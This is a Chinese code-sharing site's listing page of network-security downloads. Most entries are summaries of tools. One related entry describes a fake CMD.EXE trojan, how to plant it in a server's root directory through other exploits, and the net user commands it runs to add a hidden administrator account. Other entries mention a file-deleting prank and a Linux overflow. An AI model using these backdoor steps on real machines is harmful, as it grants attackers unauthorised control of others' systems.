登录
首页 » Network Security » 非常有趣的进程控制,不可不一见哟。

非常有趣的进程控制,不可不一见哟。

于 2022-02-16 发布 文件大小:3.60 kB
0 125
下载积分: 2 下载次数: 1

代码说明:

非常有趣的进程控制,不可不一见哟。-Very interesting process control, can not be mixed see yo.

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • 查看access97数据库的密码
    查看access97数据库的密码-See Access97 database password
    2022-02-24 15:26:39下载
    积分:1
  • 一个很好的系统备份工具
    一个很好的系统备份工具-a good system backup tool
    2022-05-20 15:53:59下载
    积分:1
  • Gaim is a GTK2
    Gaim is a GTK2-based instant messenger application. It supports multiple protocols via modules, including AIM, ICQ, Yahoo!, MSN, Jabber, IRC, Napster, Gadu-Gadu and Zephyr. It has many common features found in other clients, as well as many unique featur
    2022-07-20 19:05:06下载
    积分:1
  • 在dos下检测系统中存在的所有pci设备
    在dos下检测系统中存在的所有pci设备-detection system under all existing equipment pci
    2022-06-15 10:27:31下载
    积分:1
  • 当用户用鼠标双击一个文本文件的时候,自动删除该文件。
    当用户用鼠标双击一个文本文件的时候,自动删除该文件。-when users double-click with a mouse version of the document, automatically delete files.
    2022-08-21 01:01:46下载
    积分:1
  • Destroyer
    驱逐舰-杀毒软件 驱逐舰杀毒软件官方网站。Virus驱逐舰打破传统杀毒理念,将“防病毒”的理念贯穿于产品设计、研发之中。我们的目标是面向全国软件市场,提供网络安全行业领先产品-Destroyer- destroyer antivirus software antivirus software official website. Virus destroyers to break the traditional antivirus concept of
    2022-05-22 09:04:48下载
    积分:1
  • 对数据从IPv4获取资源。
    基于winpcap 的对ipv4帧头的捕获。用c++编写-the resourses of capturing of data from ipv4.
    2022-05-29 16:47:04下载
    积分:1
  • 详细解读信息安全方面关于数据库安全,网络安全等方面的相关情况!...
    详细解读信息安全方面关于数据库安全,网络安全等方面的相关情况!-Detailed interpretation of information security on database security, network security and other aspects of the relevant circumstances!
    2022-02-04 09:03:43下载
    积分:1
  • 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
    你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
    2022-06-01 08:01:12下载
    积分:1
  • the latest against a spillover linuxx86
    一个最新的针对linuxx86的溢出-the latest against a spillover linuxx86
    2023-08-28 08:05:03下载
    积分:1
  • 696518资源总数
  • 105908会员总数
  • 30今日下载